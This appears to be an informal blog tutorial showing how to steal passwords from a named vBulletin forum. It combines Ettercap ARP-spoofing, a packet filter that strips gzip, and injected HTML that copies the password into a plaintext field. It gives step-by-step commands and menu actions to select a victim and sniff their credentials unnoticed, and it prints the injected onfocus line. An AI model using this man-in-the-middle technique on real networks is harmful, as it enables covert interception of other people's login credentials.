You are assumed that you have knowledge about ettercap as we are going to use
ettercap for this tuto I did this mini tutorial cos i wanted to play with ettercap filters. If u had ever sniffed for username and password from RE Forum, U would noticed
that the username is sent in clear text but the password is sent as a MD5 hash.
The MD5 hash is computed by a javascript. If we look into the source code of the
main forum page "http://forums.remote-exploit.org/index.php" we can notice that
the MD5 javascript is located here
"http://forums.remote-exploit.org/clientscript/vbulletin_md5.js". Lets look at
the first line of the login section of the index.php. 'onsubmit' means that when
we press LOG IN button 'md5hash' javascript function is executed.
The value entered to password field 'vb_login_password'is sent to
the javascript and next the MD5 hash is computed and send back to the FORM as
a 'vb_login_md5password' and 'vb_login_md5password_utf'.How to "hack" this login
method ? Of course we can sniff username and md5 hash and then md5 can be broken
by rainbow table. But i think there are a lot of other better way to get the
password. I like Ettercap and its packet filters. That's why I 'hacked' the
forum using my own Ettercap filter. OK. the main idea is that the password must
be forced to be send to the web server in plain text. it's obvious that the User
shouldnt notices that his/her network is sniffed. So the login script must be
modified in that way to allow normal logging into the forum. The simplest way
to do this is modifying login section of index.php. As we see bellow, there are
input tags, type='hidden'. These fields are filed in by a java md5hash script
and next are sent to the server. I think the best solution is just to add new
input field and copy password string to there. To do this, existing html code
must be modified. Lets use ETTERCAP and its filters. But first we should look
at the http traffic generated by RE Forum during logging in. Start the ETHEREAL.
As we see, HTML source code isn't sent in plain text! It is compressed by gzip
(deflate). To disable this feature we have to remove from HTTP packets this
entry "Accept-Encoding:gzip,deflate" and replace it by something other
(i've seen ettercap and yahoo tutorial,thats why i know this ;-). Lets use one
of Ettetcap filters to eliminate gzip compression. Now we can sniff network
and we notice that the forum page is sent without gzip compresion ! pure HTML
code ! so let's modify sth. I suggest replace a useless part of line 14 by sth
useful like new input tag ;-) I added ONFOCUS to login button section cos I wanted to assign
"vb_login_password.value" to x.value from new input tag to send the x to
the server in plain text. onfocus="x.value =vb_login_password.value" /> now we have new useless parameter 'x' which is send in plain text to
the server to the 'login.php'. Server ignores it, however we don't cos
this is our desired password! To start sniffing, ettercap filter must be compiled. 1.create new empty file ForumFilter.filter 2.copy and paste the included ettercap filter into the file 3.compile it. 'etterfilter ForumFilter.filter -o ForumFilter' next, start ettercap 1.Sniff ->Unified Sniffing 2.Host -> Scan for Hosts 3.Host -> Host List and add victims machine to target 1 and router etc. to target 2 4.MITM -> ARP Spoofing, Sniff Remote connections 5.Filter - > Load new filter, ...than open our ForumFilter 6.Start - > start sniffing next start ETHEREAL network is sniffed if everything is done correctly, the username and password should appear in plain
text
in the sniffer.
Post a Comment